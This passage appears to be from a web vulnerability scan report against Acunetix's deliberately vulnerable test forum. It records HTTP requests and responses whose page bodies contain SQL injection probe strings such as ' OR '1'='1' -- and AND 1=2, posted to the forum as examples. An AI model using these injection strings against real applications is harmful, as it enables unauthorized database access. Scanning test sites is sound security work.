href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4140 |
| Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:27 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4134 |
| Response Body - size: 4,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" 